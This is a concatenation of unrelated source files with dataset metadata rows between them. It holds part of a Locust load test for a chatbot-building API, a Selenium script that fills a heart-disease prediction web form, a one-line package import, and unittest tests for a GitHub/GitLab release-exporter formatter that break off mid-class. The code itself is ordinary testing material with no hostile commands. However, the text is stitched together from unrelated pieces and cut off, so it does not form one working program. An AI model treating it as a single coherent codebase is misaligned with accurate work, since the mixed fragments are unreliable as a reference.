"bot": self.user.bot,
}
with self.client.post("/api/account/registration",
json=request_body,
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
self.interrupt()
@task
class Login(SequentialTaskSet):
"""
Task for user login.
"""
@task
def login(self):
header = {"username": self.user.username, "password": self.user.password}
with self.client.post("/api/auth/login",
data=header,
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
else:
self.user.auth_token = response_data["data"]["token_type"] + " " + response_data["data"][
"access_token"]
self.interrupt()
@task
class HttpAction(SequentialTaskSet):
"""
Task to add/get/update/delete http action.
"""
@task
def add_http_action(self):
request_body = {
"intent": "slap",
"auth_token": "bearer dfiuhdfishifoshfoishnfoshfnsifjfs",
"action_name": "action_" + self.user.username,
"response": "string",
"http_url": "http://www.google.com",
"request_method": "GET",
"http_params_list": [{
"key": "testParam1",
"parameter_type": "value",
"value": "testValue1"
}]
}
with self.client.post("/api/bot/action/httpaction",
json=request_body,
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def get_http_action(self):
with self.client.get("/api/bot/action/httpaction/action_" + self.user.username,
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def update_http_action(self):
request_body = {
"intent": "greet_test_update_http_action",
"auth_token": "",
"action_name": "action_" + self.user.username,
"response": "",
"http_url": "http://www.google.com",
"request_method": "GET",
"http_params_list": [{
"key": "testParam1",
"parameter_type": "value",
"value": "testValue1"
}]
}
with self.client.put("/api/bot/action/httpaction",
json=request_body,
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def delete_http_action(self):
with self.client.delete("/api/bot/action/httpaction/action_" + self.user.username,
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
self.interrupt()
@task
class Intents(SequentialTaskSet):
    """
    Sequential tasks to add, list and delete an intent.
    """

    def _check(self, task_name, response):
        """Log *response* and mark the request failed when the body is empty
        or the API reports ``success == False``.

        :param task_name: calling task's name, used as the log prefix.
        :param response: locust response context manager for the request.
        :return: parsed JSON payload on success, otherwise None.
        """
        if response.text is None or not response.text.strip():
            logging.error(task_name + " Failed: response is None")
            response.failure(task_name + " Failed: response is None")
            return None
        logging.info(task_name + ": " + response.text)
        response_data = response.json()
        if not response_data["success"]:
            logging.error(task_name + " Failed: " + response_data['message'])
            response.failure(task_name + " Failed: " + response_data['message'])
            return None
        return response_data

    @task
    def add_intents(self):
        """POST a new intent named 'happier'."""
        with self.client.post("/api/bot/intents",
                              json={"data": "happier"},
                              headers={"Authorization": self.user.auth_token},
                              catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)

    @task
    def get_intents(self):
        """GET the list of intents."""
        with self.client.get("/api/bot/intents",
                             headers={"Authorization": self.user.auth_token},
                             catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)

    @task
    def delete_intent(self):
        """DELETE the intent created by add_intents, then leave this task set."""
        with self.client.delete("/api/bot/intents/happier/True",
                                headers={"Authorization": self.user.auth_token},
                                catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)
        self.interrupt()
@task
class TrainingExamples(SequentialTaskSet):
    """
    Sequential tasks to add, list, update and delete training examples.
    """

    def _check(self, task_name, response):
        """Log *response* and mark the request failed when the body is empty
        or the API reports ``success == False``.

        :param task_name: calling task's name, used as the log prefix.
        :param response: locust response context manager for the request.
        :return: parsed JSON payload on success, otherwise None.
        """
        if response.text is None or not response.text.strip():
            logging.error(task_name + " Failed: response is None")
            response.failure(task_name + " Failed: response is None")
            return None
        logging.info(task_name + ": " + response.text)
        response_data = response.json()
        if not response_data["success"]:
            logging.error(task_name + " Failed: " + response_data['message'])
            response.failure(task_name + " Failed: " + response_data['message'])
            return None
        return response_data

    @task
    def add_training_example(self):
        """POST a new training example for the 'greet' intent."""
        with self.client.post("/api/bot/training_examples/greet",
                              json={"data": ["How do you do?"]},
                              headers={"Authorization": self.user.auth_token},
                              catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)

    @task
    def get_training_example(self):
        """GET the training examples of the 'greet' intent."""
        with self.client.get("/api/bot/training_examples/greet",
                             headers={"Authorization": self.user.auth_token},
                             catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)

    @task
    def update_training_example(self):
        """Fetch the 'greet' examples and PUT new text on the first one."""
        with self.client.get("/api/bot/training_examples/greet",
                             headers={"Authorization": self.user.auth_token},
                             catch_response=True) as training_examples:
            response_data = self._check(inspect.stack()[0][3], training_examples)
            if response_data is None:
                # Bug fix: the original fell through to the PUT with an
                # unbound response_data when the fetch returned an empty body.
                return
        with self.client.put("/api/bot/training_examples/greet/" + response_data["data"][0]["_id"],
                             json={"data": "hey, there"},
                             headers={"Authorization": self.user.auth_token},
                             catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)

    @task
    def delete_training_example(self):
        """Fetch the 'greet' examples, DELETE the first one, then leave."""
        with self.client.get("/api/bot/training_examples/greet",
                             headers={"Authorization": self.user.auth_token},
                             catch_response=True) as training_examples:
            response_data = self._check(inspect.stack()[0][3], training_examples)
            if response_data is None:
                return
        with self.client.delete("/api/bot/training_examples",
                                json={"data": response_data["data"][0]["_id"]},
                                headers={"Authorization": self.user.auth_token},
                                catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)
        self.interrupt()
@task
class Responses(SequentialTaskSet):
    """
    Sequential tasks to add, list, update and delete responses.
    """

    def _check(self, task_name, response):
        """Log *response* and mark the request failed when the body is empty
        or the API reports ``success == False``.

        :param task_name: calling task's name, used as the log prefix.
        :param response: locust response context manager for the request.
        :return: parsed JSON payload on success, otherwise None.
        """
        if response.text is None or not response.text.strip():
            logging.error(task_name + " Failed: response is None")
            response.failure(task_name + " Failed: response is None")
            return None
        logging.info(task_name + ": " + response.text)
        response_data = response.json()
        if not response_data["success"]:
            logging.error(task_name + " Failed: " + response_data['message'])
            response.failure(task_name + " Failed: " + response_data['message'])
            return None
        return response_data

    @task
    def add_response(self):
        """POST a new utterance for utter_greet."""
        with self.client.post("/api/bot/response/utter_greet",
                              json={"data": "Wow! How are you?"},
                              headers={"Authorization": self.user.auth_token},
                              catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)

    @task
    def get_response(self):
        """GET the utterances of utter_greet."""
        with self.client.get("/api/bot/response/utter_greet",
                             headers={"Authorization": self.user.auth_token},
                             catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)

    @task
    def update_response(self):
        """Fetch the utter_greet utterances and PUT new text on the first one."""
        with self.client.get("/api/bot/response/utter_greet",
                             headers={"Authorization": self.user.auth_token},
                             catch_response=True) as utterances:
            response_data = self._check(inspect.stack()[0][3], utterances)
            if response_data is None:
                # Bug fix: the original proceeded to the PUT even after a
                # failed fetch, reading an unbound/stale response_data.
                # Now consistent with TrainingExamples.update_training_example.
                return
        with self.client.put("/api/bot/response/utter_greet/" + response_data["data"][0]["_id"],
                             json={"data": "Hello, How are you!"},
                             headers={"Authorization": self.user.auth_token},
                             catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)

    @task
    def delete_response(self):
        """Fetch the utter_greet utterances, DELETE the first one, then leave."""
        with self.client.get("/api/bot/response/utter_greet",
                             headers={"Authorization": self.user.auth_token},
                             catch_response=True) as utterances:
            response_data = self._check(inspect.stack()[0][3], utterances)
            if response_data is None:
                return
        with self.client.delete("/api/bot/response",
                                json={"data": response_data["data"][0]["_id"]},
                                headers={"Authorization": self.user.auth_token},
                                catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)
        self.interrupt()
@task
class Stories(SequentialTaskSet):
    """
    Sequential tasks to add and list stories.
    """

    def _check(self, task_name, response):
        """Log *response* and mark the request failed when the body is empty
        or the API reports ``success == False``.

        :param task_name: calling task's name, used as the log prefix.
        :param response: locust response context manager for the request.
        :return: parsed JSON payload on success, otherwise None.
        """
        if response.text is None or not response.text.strip():
            logging.error(task_name + " Failed: response is None")
            response.failure(task_name + " Failed: response is None")
            return None
        logging.info(task_name + ": " + response.text)
        response_data = response.json()
        if not response_data["success"]:
            logging.error(task_name + " Failed: " + response_data['message'])
            response.failure(task_name + " Failed: " + response_data['message'])
            return None
        return response_data

    @task
    def add_story(self):
        """POST a simple two-step story (greet -> utter_greet)."""
        request = {
            "name": "test_path",
            "events": [
                {"name": "greet", "type": "user"},
                {"name": "utter_greet", "type": "action"},
            ],
        }
        with self.client.post("/api/bot/stories",
                              json=request,
                              headers={"Authorization": self.user.auth_token},
                              catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)

    @task
    def get_story(self):
        """GET the list of stories."""
        with self.client.get("/api/bot/stories",
                             headers={"Authorization": self.user.auth_token},
                             catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)

    @task
    def get_utterance_from_intent(self):
        """GET the utterance mapped to the 'greet' intent, then leave."""
        with self.client.get("/api/bot/utterance_from_intent/greet",
                             headers={"Authorization": self.user.auth_token},
                             catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)
        self.interrupt()
@task
class Endpoint(SequentialTaskSet):
    """
    Sequential tasks to set and get endpoints.
    """

    def _check(self, task_name, response):
        """Log *response* and mark the request failed when the body is empty
        or the API reports ``success == False``.

        :param task_name: calling task's name, used as the log prefix.
        :param response: locust response context manager for the request.
        :return: parsed JSON payload on success, otherwise None.
        """
        if response.text is None or not response.text.strip():
            logging.error(task_name + " Failed: response is None")
            response.failure(task_name + " Failed: response is None")
            return None
        logging.info(task_name + ": " + response.text)
        response_data = response.json()
        if not response_data["success"]:
            logging.error(task_name + " Failed: " + response_data['message'])
            response.failure(task_name + " Failed: " + response_data['message'])
            return None
        return response_data

    @task
    def set_endpoint(self):
        """PUT bot/action/tracker endpoint URLs."""
        with self.client.put("/api/bot/endpoint",
                             json={"bot_endpoint": {"url": "http://localhost:5005/"},
                                   "action_endpoint": {"url": "http://localhost:5000/"},
                                   "tracker_endpoint": {"url": "mongodb://localhost:27017", "db": "rasa"}},
                             headers={"Authorization": self.user.auth_token},
                             catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)

    @task
    def get_endpoint(self):
        """GET the configured endpoints, then leave this task set."""
        with self.client.get("/api/bot/endpoint",
                             headers={"Authorization": self.user.auth_token},
                             catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)
        self.interrupt()
@task
class Configurations(SequentialTaskSet):
    """
    Sequential tasks to set and get configurations.
    """

    def _check(self, task_name, response):
        """Log *response* and mark the request failed when the body is empty
        or the API reports ``success == False``.

        :param task_name: calling task's name, used as the log prefix.
        :param response: locust response context manager for the request.
        :return: parsed JSON payload on success, otherwise None.
        """
        if response.text is None or not response.text.strip():
            logging.error(task_name + " Failed: response is None")
            response.failure(task_name + " Failed: response is None")
            return None
        logging.info(task_name + ": " + response.text)
        response_data = response.json()
        if not response_data["success"]:
            logging.error(task_name + " Failed: " + response_data['message'])
            response.failure(task_name + " Failed: " + response_data['message'])
            return None
        return response_data

    @task
    def set_config(self):
        """PUT the default template configuration."""
        with self.client.put("/api/bot/config",
                             json=read_config_file('./template/config/default.yml'),
                             headers={"Authorization": self.user.auth_token},
                             catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)

    @task
    def get_config(self):
        """GET the bot configuration, then leave this task set."""
        with self.client.get("/api/bot/config",
                             headers={"Authorization": self.user.auth_token},
                             catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)
        self.interrupt()
@task
class Templates(SequentialTaskSet):
    """
    Sequential tasks to set and get use-case and config templates.
    """

    def _check(self, task_name, response):
        """Log *response* and mark the request failed when the body is empty
        or the API reports ``success == False``.

        :param task_name: calling task's name, used as the log prefix.
        :param response: locust response context manager for the request.
        :return: parsed JSON payload on success, otherwise None.
        """
        if response.text is None or not response.text.strip():
            logging.error(task_name + " Failed: response is None")
            response.failure(task_name + " Failed: response is None")
            return None
        logging.info(task_name + ": " + response.text)
        response_data = response.json()
        if not response_data["success"]:
            logging.error(task_name + " Failed: " + response_data['message'])
            response.failure(task_name + " Failed: " + response_data['message'])
            return None
        return response_data

    @task
    def set_templates(self):
        """POST the 'Hi-Hello' use-case template."""
        with self.client.post("/api/bot/templates/use-case",
                              json={"data": "Hi-Hello"},
                              headers={"Authorization": self.user.auth_token},
                              catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)

    @task
    def get_templates(self):
        """GET the available use-case templates."""
        with self.client.get("/api/bot/templates/use-case",
                             headers={"Authorization": self.user.auth_token},
                             catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)

    @task
    def set_config_templates(self):
        """POST the 'default' config template."""
        with self.client.post("/api/bot/templates/config",
                              json={"data": "default"},
                              headers={"Authorization": self.user.auth_token},
                              catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)

    @task
    def get_config_templates(self):
        """GET the config templates, then stop this simulated user."""
        with self.client.get("/api/bot/templates/config",
                             headers={"Authorization": self.user.auth_token},
                             catch_response=True) as response:
            self._check(inspect.stack()[0][3], response)
        # Last task of the whole flow: terminate the user instead of looping.
        raise StopUser()
class KaironUser(HttpUser):
    """
    Simulated load-test user: assigns unique per-user credentials on start
    and purges the user's database records on stop.
    """
    tasks = [ExecuteTask]
    wait_time = between(1, 2)
    auth_token = None
    username = None
    email = None
    first_name = None
    last_name = None
    password = None
    account = None
    bot = None

    def on_start(self):
        # Claim the next free user index so every concurrent user is unique.
        global USER_INDEX
        os.environ["system_file"] = "./tests/testing_data/system.yaml"
        env = ConfigLoader(os.getenv("system_file", "./system.yaml")).get_config()
        self.email = f'user{USER_INDEX}@demo.ai'
        self.username = self.email
        self.first_name = 'load'
        self.last_name = 'test'
        self.password = env['security']['test_user_password']
        self.account = f'user{USER_INDEX}'
        self.bot = f'user{USER_INDEX}'
        USER_INDEX += 1

    def on_stop(self):
        # Best-effort teardown: never let a cleanup error break the run.
        logging.info("Cleaning up database..")
        try:
            os.environ["system_file"] = "./tests/testing_data/system.yaml"
            env = ConfigLoader(os.getenv("system_file", "./system.yaml")).get_config()
            db_host = env['database']["stress_test"]
            logging.info("Connecting to: " + db_host)
            connect(host=db_host)
            User.objects(email=self.username).delete()
            Bot.objects(name=self.bot).delete()
            Account.objects(name=self.account).delete()
            logging.info("Cleanup complete")
            disconnect()
        except Exception as e:
            logging.error(e)
| 52.727666 | 113 | 0.505889 | 3,622 | 36,593 | 5.011596 | 0.057427 | 0.105773 | 0.114588 | 0.123402 | 0.869822 | 0.851036 | 0.84134 | 0.806468 | 0.79578 | 0.785754 | 0 | 0.015934 | 0.362009 | 36,593 | 693 | 114 | 52.803752 | 0.761587 | 0.019075 | 0 | 0.747856 | 0 | 0 | 0.147335 | 0.023226 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051458 | false | 0.008576 | 0.015437 | 0 | 0.109777 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c6bcd2c329e60ecda6730ec3cf2764b950b20806 | 4,248 | py | Python | test_script.py | ghatoledipak/Heart-Disease-Prediction-KNN | 3eb44975ad92dfa600b875bfc7f79f5d0c971d91 | [
"MIT"
] | null | null | null | test_script.py | ghatoledipak/Heart-Disease-Prediction-KNN | 3eb44975ad92dfa600b875bfc7f79f5d0c971d91 | [
"MIT"
] | null | null | null | test_script.py | ghatoledipak/Heart-Disease-Prediction-KNN | 3eb44975ad92dfa600b875bfc7f79f5d0c971d91 | [
"MIT"
] | 3 | 2021-02-12T16:40:51.000Z | 2021-12-28T18:12:33.000Z | from selenium import webdriver
from selenium.webdriver.support.ui import Select
import time
def knn():
    """Fill and submit the KNN prediction form with one fixed sample patient.

    Drives the locally running Flask app (http://127.0.0.1:5000/) through
    Chrome. The browser is now always closed on exit - the original leaked
    one Chrome process per call because ``driver.quit()`` was never invoked.
    """
    driver = webdriver.Chrome('chromedriver.exe')
    try:
        driver.get('http://127.0.0.1:5000/')
        time.sleep(2)
        driver.find_element_by_id('btn3').click()  # open the KNN form
        # (kind, element id, value) in the same order the form was filled
        # originally: 'text' fields get keys typed, 'select' dropdowns get
        # their second option (index 1) chosen.
        form_steps = [
            ('text', 'age', '54'),
            ('select', 'sex', 1),
            ('select', 'cp', 1),
            ('text', 'trestbps', '89'),
            ('text', 'chol', '69'),
            ('select', 'fbs', 1),
            ('select', 'restecg', 1),
            ('text', 'thalach', '88'),
            ('text', 'exang', '55'),
            ('select', 'oldpeak', 1),
            ('select', 'slope', 1),
            ('select', 'ca', 1),
            ('select', 'thal', 1),
        ]
        for kind, element_id, value in form_steps:
            element = driver.find_element_by_id(element_id)
            if kind == 'text':
                element.send_keys(value)
            else:
                Select(element).select_by_index(value)
        time.sleep(3)
        driver.find_element_by_id('subbtn').click()
        time.sleep(3)
    finally:
        driver.quit()
def gradient():
    """Fill and submit the gradient-boosting prediction form with one fixed
    sample patient.

    Drives the locally running Flask app (http://127.0.0.1:5000/) through
    Chrome. The browser is now always closed on exit - the original leaked
    one Chrome process per call because ``driver.quit()`` was never invoked.
    """
    driver = webdriver.Chrome('chromedriver.exe')
    try:
        driver.get('http://127.0.0.1:5000/')
        time.sleep(3)
        driver.find_element_by_id('btn1').click()  # open the gradient form
        # (kind, element id, value) in the original fill order: 'text'
        # fields get keys typed, 'select' dropdowns pick option index 1.
        form_steps = [
            ('text', 'age', '54'),
            ('select', 'sex', 1),
            ('select', 'cp', 1),
            ('text', 'trestbps', '89'),
            ('text', 'chol', '69'),
            ('select', 'fbs', 1),
            ('select', 'restecg', 1),
            ('text', 'thalach', '88'),
            ('text', 'exang', '55'),
            ('select', 'oldpeak', 1),
            ('select', 'slope', 1),
            ('select', 'ca', 1),
            ('select', 'thal', 1),
        ]
        for kind, element_id, value in form_steps:
            element = driver.find_element_by_id(element_id)
            if kind == 'text':
                element.send_keys(value)
            else:
                Select(element).select_by_index(value)
        time.sleep(3)
        driver.find_element_by_id('subbtn').click()
        time.sleep(5)
    finally:
        driver.quit()
def random_forest():
    """Fill and submit the random-forest prediction form with one fixed
    sample patient.

    Drives the locally running Flask app (http://127.0.0.1:5000/) through
    Chrome. The browser is now always closed on exit - the original leaked
    one Chrome process per call because ``driver.quit()`` was never invoked.
    """
    driver = webdriver.Chrome('chromedriver.exe')
    try:
        driver.get('http://127.0.0.1:5000/')
        time.sleep(3)
        driver.find_element_by_id('btn2').click()  # open the random-forest form
        # (kind, element id, value) in the original fill order: 'text'
        # fields get keys typed, 'select' dropdowns pick option index 1.
        form_steps = [
            ('text', 'age', '54'),
            ('select', 'sex', 1),
            ('select', 'cp', 1),
            ('text', 'trestbps', '89'),
            ('text', 'chol', '69'),
            ('select', 'fbs', 1),
            ('select', 'restecg', 1),
            ('text', 'thalach', '88'),
            ('text', 'exang', '55'),
            ('select', 'oldpeak', 1),
            ('select', 'slope', 1),
            ('select', 'ca', 1),
            ('select', 'thal', 1),
        ]
        for kind, element_id, value in form_steps:
            element = driver.find_element_by_id(element_id)
            if kind == 'text':
                element.send_keys(value)
            else:
                Select(element).select_by_index(value)
        time.sleep(3)
        driver.find_element_by_id('subbtn').click()
        time.sleep(5)
    finally:
        driver.quit()
if __name__ == '__main__':
    # Run the three browser scenarios only when executed as a script, so
    # importing this module does not launch Chrome sessions as a side effect.
    gradient()
    knn()
    random_forest()
c6bf225e5d299e6da87ac463b8e8daa46e536e71 | 37 | py | Python | dicomanonymizer/__init__.py | emeyer/dicom-anonymizer | 0ce618626aaf03891da6b85b205818a45b7ff7d1 | [
"BSD-3-Clause"
] | null | null | null | dicomanonymizer/__init__.py | emeyer/dicom-anonymizer | 0ce618626aaf03891da6b85b205818a45b7ff7d1 | [
"BSD-3-Clause"
] | null | null | null | dicomanonymizer/__init__.py | emeyer/dicom-anonymizer | 0ce618626aaf03891da6b85b205818a45b7ff7d1 | [
"BSD-3-Clause"
] | null | null | null | from .simpledicomanonymizer import *
| 18.5 | 36 | 0.837838 | 3 | 37 | 10.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 37 | 1 | 37 | 37 | 0.939394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
05be165851687090fa019ed48f4c3ce3d69f272f | 150 | py | Python | loldib/getratings/models/NA/na_irelia/__init__.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_irelia/__init__.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | loldib/getratings/models/NA/na_irelia/__init__.py | koliupy/loldib | c9ab94deb07213cdc42b5a7c26467cdafaf81b7f | [
"Apache-2.0"
] | null | null | null | from .na_irelia_top import *
from .na_irelia_jng import *
from .na_irelia_mid import *
from .na_irelia_bot import *
from .na_irelia_sup import *
| 25 | 29 | 0.766667 | 25 | 150 | 4.2 | 0.36 | 0.285714 | 0.571429 | 0.685714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 150 | 5 | 30 | 30 | 0.84 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
05e846b8c7a4efe9595130643fa3c9cb2878ea19 | 5,641 | py | Python | tests/test_formatter.py | akshaybabloo/release-exporter-old | 91ed54f792f0cefbb1c09307d92c7f0479853d0f | [
"MIT"
] | 15 | 2018-10-27T16:58:52.000Z | 2021-12-15T08:58:50.000Z | tests/test_formatter.py | akshaybabloo/release-exporter | 39c3e4bec836889ac79e0b2739bdb14635c94c34 | [
"MIT"
] | 47 | 2018-01-22T13:09:42.000Z | 2022-03-29T17:02:14.000Z | tests/test_formatter.py | akshaybabloo/release-exporter-old | 91ed54f792f0cefbb1c09307d92c7f0479853d0f | [
"MIT"
] | 6 | 2018-02-16T13:30:47.000Z | 2021-12-16T15:15:54.000Z | import io
import os
import unittest
from unittest.mock import patch
from release_exporter.formatter import github, gitlab
# ------------------------- GitHub --------------------------
class TestGitHubFormatMarkdown(unittest.TestCase):
    """Integration tests for the GitHub markdown changelog formatter.

    Requires a valid ``GITHUB_TOKEN`` environment variable; talks to the
    live GitHub API and writes output files.
    """

    def setUp(self):
        self.github_format = github(force=True, token=os.environ['GITHUB_TOKEN'],
                                    repo_url='https://github.com/akshaybabloo/release-exporter')

    @patch('sys.stdout', new_callable=io.StringIO)
    def assert_stdout_1(self, n, expected_output, mock_stdout):
        """Run _converter() and assert *expected_output* was printed.

        ``n`` is an unused placeholder (callers pass '').
        """
        # Only the printed output matters; the return value was previously
        # bound to an unused local.
        self.github_format._converter()
        self.assertIn(expected_output, mock_stdout.getvalue())

    @patch('sys.stdout', new_callable=io.StringIO)
    def assert_stdout_2(self, n, expected_output, mock_stdout):
        """Run write_markdown() and assert *expected_output* was printed."""
        self.github_format.write_markdown()
        self.assertIn(expected_output, mock_stdout.getvalue())

    @patch('sys.stdout', new_callable=io.StringIO)
    def assert_stdout_3(self, n, expected_output, mock_stdout):
        """Run write() and assert *expected_output* was printed."""
        self.github_format.write()
        self.assertIn(expected_output, mock_stdout.getvalue())

    def test_convert(self):
        result = self.github_format._converter()
        self.assertIsInstance(result, tuple)
        self.assertIn('changelog', result[0])

    def test_output(self):
        self.assert_stdout_1('', 'Provider')

    def test_write_markdown(self):
        self.assert_stdout_2('', 'Done')

    def test_write(self):
        self.assert_stdout_3('', 'created')
class TestGitHubFormatJson(unittest.TestCase):
    """Integration tests for the GitHub JSON changelog formatter.

    Requires a valid ``GITHUB_TOKEN`` environment variable; talks to the
    live GitHub API and writes output files.
    """

    def setUp(self):
        self.github_format = github(force=True, token=os.environ['GITHUB_TOKEN'],
                                    repo_url='https://github.com/akshaybabloo/release-exporter', file_type='json')

    @patch('sys.stdout', new_callable=io.StringIO)
    def assert_stdout_1(self, n, expected_output, mock_stdout):
        """Run _converter() and assert *expected_output* was printed.

        ``n`` is an unused placeholder (callers pass '').
        """
        # Only the printed output matters; the return value was previously
        # bound to an unused local.
        self.github_format._converter()
        self.assertIn(expected_output, mock_stdout.getvalue())

    @patch('sys.stdout', new_callable=io.StringIO)
    def assert_stdout_2(self, n, expected_output, mock_stdout):
        """Run write_json() and assert *expected_output* was printed."""
        self.github_format.write_json()
        self.assertIn(expected_output, mock_stdout.getvalue())

    @patch('sys.stdout', new_callable=io.StringIO)
    def assert_stdout_3(self, n, expected_output, mock_stdout):
        """Run write() and assert *expected_output* was printed."""
        self.github_format.write()
        self.assertIn(expected_output, mock_stdout.getvalue())

    def test_convert(self):
        result = self.github_format._converter()
        self.assertIs(result, None)
        self.assertIn('provider', self.github_format._dict_repo_template())

    def test_output(self):
        self.assert_stdout_1('', 'Provider')

    def test_write_markdown(self):
        self.assert_stdout_2('', 'Done')

    def test_write(self):
        self.assert_stdout_3('', 'created')
# ------------------------- GitLab --------------------------
class TestGitLabFormatMarkdown(unittest.TestCase):
    """Integration tests for the GitLab markdown changelog formatter.

    Requires a valid ``GITLAB_TOKEN`` environment variable; talks to the
    live GitLab API and writes output files.
    """

    def setUp(self):
        self.gitlab_format = gitlab(force=True, token=os.environ['GITLAB_TOKEN'],
                                    repo_url='https://gitlab.com/akshaybabloo/test-releases')

    @patch('sys.stdout', new_callable=io.StringIO)
    def assert_stdout_1(self, n, expected_output, mock_stdout):
        """Run _converter() and assert *expected_output* was printed.

        ``n`` is an unused placeholder (callers pass '').
        """
        # Only the printed output matters; the return value was previously
        # bound to an unused local.
        self.gitlab_format._converter()
        self.assertIn(expected_output, mock_stdout.getvalue())

    @patch('sys.stdout', new_callable=io.StringIO)
    def assert_stdout_2(self, n, expected_output, mock_stdout):
        """Run write_markdown() and assert *expected_output* was printed."""
        self.gitlab_format.write_markdown()
        self.assertIn(expected_output, mock_stdout.getvalue())

    @patch('sys.stdout', new_callable=io.StringIO)
    def assert_stdout_3(self, n, expected_output, mock_stdout):
        """Run write() and assert *expected_output* was printed."""
        self.gitlab_format.write()
        self.assertIn(expected_output, mock_stdout.getvalue())

    def test_convert(self):
        result = self.gitlab_format._converter()
        self.assertIsInstance(result, tuple)
        self.assertIn('changelog', result[0])

    def test_output(self):
        self.assert_stdout_1('', 'Provider')

    def test_write_markdown(self):
        self.assert_stdout_2('', 'Done')

    def test_write(self):
        self.assert_stdout_3('', 'created')
class TestGitLabFormatJson(unittest.TestCase):
    """Integration tests for the GitLab JSON changelog formatter.

    Requires a valid ``GITLAB_TOKEN`` environment variable; talks to the
    live GitLab API and writes output files.
    """

    def setUp(self):
        self.gitlab_format = gitlab(force=True, token=os.environ['GITLAB_TOKEN'],
                                    repo_url='https://gitlab.com/akshaybabloo/test-releases', file_type='json')

    @patch('sys.stdout', new_callable=io.StringIO)
